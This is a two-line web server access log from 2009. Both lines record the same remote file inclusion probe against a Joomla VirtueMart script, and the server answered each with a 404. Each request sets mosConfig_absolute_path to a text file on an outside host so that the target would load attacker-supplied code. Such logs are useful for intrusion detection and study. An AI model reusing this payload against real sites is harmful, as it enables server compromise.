211.43.202.66 - - [26/Jul/2009:10:58:45 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:10:58:46 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
